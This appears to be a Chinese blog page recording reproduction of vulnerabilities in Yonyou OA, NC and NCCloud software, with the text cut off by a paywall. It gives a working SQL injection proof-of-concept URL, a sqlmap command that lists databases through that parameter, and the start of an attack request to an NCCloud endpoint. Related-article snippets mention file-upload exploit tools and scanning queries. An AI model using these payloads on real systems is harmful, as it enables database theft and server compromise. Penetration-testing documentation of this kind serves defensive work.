用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录

最新推荐文章于 2025-11-07 09:41:26 发布

原创

最新推荐文章于 2025-11-07 09:41:26 发布 · 8.2k 阅读

12 ·

CC 4.0 BY-SA版权

文章标签：

#渗透测试 #数据安全 #信息安全

本文详细介绍了用友公司多个产品存在的安全漏洞，包括SQL注入、远程命令执行和文件操作漏洞。提供了漏洞复现的POC和利用方式，并给出了相应的sqlmap检测命令。同时，文章强调了非法使用信息的危害，并提出了升级版本和限制访问等修复建议。

简介

用友公司成立于1988年，全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案，是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。

漏洞情况
用友OA_U8 存在SQL 注入
用友NCCloud FS文件管理 SQL 注入
用友NC bsh.servlet.BshServlet 远程命令执行
用友NC 任意文件上传 getShell

漏洞复现

1.用友 OA_U8 SQL 注入

poc

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

如果出现一下指纹则存在sql注入点注入点是 S1

用友sql注入指纹

直接使用SqlMap 进行检测

python sqlmap.py -u url/yyoa/common/js/menu/test.jsp?doType=101&S1=1 --random-agent -p S1 --dbs

2.用友 NCCloud FS文件管理 SQL 注入

poc

GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1
Host: xxxxx
Upgrade-Insecure-Requests: 1
Use

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

烽铃子

关注关注

3
点赞
踩
12

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

用友NC-Cloud全版本任意文件上传

初岄的博客

10-20

860

用友NC-Cloud最近爆出存在全版本任意文件上传漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用，目前找不到此漏洞适用的最低版本。攻击者可以通过该漏洞将任意文件上传至服务器，并以此将webshell上传至服务器，从而获得服务器的命令执行权限。

用友filereceiveservlet-fileupload-CNVD-2023-85593

qq_36334672的博客

01-25

982

用友NC6.5。

2 条评论您还未登录，请先登录后发表或查看评论

2 条评论

gududeajun 2022.05.30
请问任意文件上传的poc是怎么用的
- 烽铃子回复gududeajun 2022.06.01
  修改url后 python3进行执行

【漏洞复现】用友NC——文件上传漏洞

weixin_54799594的博客

07-16

2524

漏洞复现过程记录

用友NC 遇到的几个漏洞

最新发布

sudamasami的博客

11-07

456

用友NC-Cloud，大型企业数字化平台，聚焦数字化管理、数字化经营、数字化商业，帮助大型企业实现人、财、物、客的全面数字化，从而驱动业务创新与管理变革，与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞，攻击者可以在xml中构造恶意命令，最终导致服务器被远控。构造数据包 curl直接复制Windows cmd运行自行修改IP地址yakit数据包。

漏洞复现-用友UFIDA-YongYou系列

aming小老弟

10-03

3235

UFIDA是中国的一家知名企业软件公司，全称为用友软件股份有限公司（Yonyou Software Co . , Ltd . ）。该公司成立于 1988 年，总部位于北京，是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案，包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业，如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程，并提供数据分析和决策支持工具。

【漏洞复现】用友NC-任意文件上传-uploadFile

漏洞复现

05-05

614

用友NC是北京用友软件股份有限公司（简称“用友”）开发的一款企业管理软件，支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域，涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统，提供基于云计算、SaaS模式、本地部署等多种部署方式，广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件，潜在风险包括远程执行恶意代码、访问敏感数据，以及其他危险操作。

【漏洞复现】用友NC-accept-任意文件上传

漏洞复现

01-23

594

用友NC是北京用友软件股份有限公司（简称“用友”）开发的一款企业管理软件，支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域，涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统，提供基于云计算、SaaS模式、本地部署等多种部署方式，广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过accept.jsp接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件，潜在风险包括远程执行恶意代码、访问敏感数据，以及其他危险操作。

红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0，附工具下载链接。

白帽子黑客SuperherRo

09-22

927

红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统的漏洞检测和利用，共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.已实现ＯＡ：通达、泛微、万户、致远、用友、蓝凌、极限、红帆、华天、金蝶、金和、启莱、新点、信呼、一米、致翔、智明、宏景、广联达、易宝共20款OA系统漏洞检测和利用．支持单个或批量检测利用.

2021 HW 漏洞清单汇总 ( 附 poc )

热门推荐

gjgj的博客

04-23

1万+

2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞（历史漏洞） CNVD-2021-17391 启明星辰天清汉马USG防火墙逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...

2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)

08-21

5430

2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总，截止目前已更新到91个漏洞，本文会实时更新，有新的漏洞都会加上

用友NC accept.jsp任意文件上传（含批量验证poc）

weixin_43567873的博客

04-15

301

用友NC accept.jsp任意文件上传（含批量验证poc）

用友NC任意文件上传漏洞利用工具

04-14

用友NC任意文件上传漏洞利用工具，用友NC6.5的某个页面，存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制，未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞，成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。

用友 NC Cloud jsinvoke 任意文件上传

故事讲予风听

12-01

1824

用友 NC Cloud 中存在 jsinvoke 接口的任意文件上传漏洞，攻击者可以通过利用此漏洞向系统上传任意恶意文件。

用友NC系统FileManager接口处存在任意文件上传

m0_73334898的博客

09-29

972

nuclei -l urls.txt -t 本地文件所在地址/yongyou-NC-FileManager-fileupload.yaml。name: 用友NC系统FileManager接口处接口存在任意文件上传漏洞。fofa-query: app="用友-UFIDA-NC"用友NC系统FileManager接口处存在任意文件上传。fofa语句 app="用友-UFIDA-NC"

用友 NCCloud FS文件管理SQL注入

应无所住而生其心

08-18

555

子曰：“道千乘之国，敬事而信，节用而爱人，使民以时。”

有了这个网络安全面试题，面试就像开了挂！（附PDF）

lvaolan的博客

02-26

2336

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！【完整版领取方式在文末！！内容实在太多，不一一截图了。

用友NC任意文件上传漏洞复现

Adminxe的博客

12-14

1万+

0x00 事件描述用友NC是一款企业级管理软件，在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构，使用JAVA编程语言开发，客户端可直接使用UClient，服务端接口为HTTP。用友NC6.5的某个页面，存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制，未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞，成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。 0x01 漏洞原理根据文档，FileRece..

用友漏洞php,用友NC任意文件上传漏洞复现

weixin_29786123的博客

03-29

2936

用友NC-mp-任意文件上传

weixin_43567873的博客

03-06

832

用友NC-mp-任意文件上传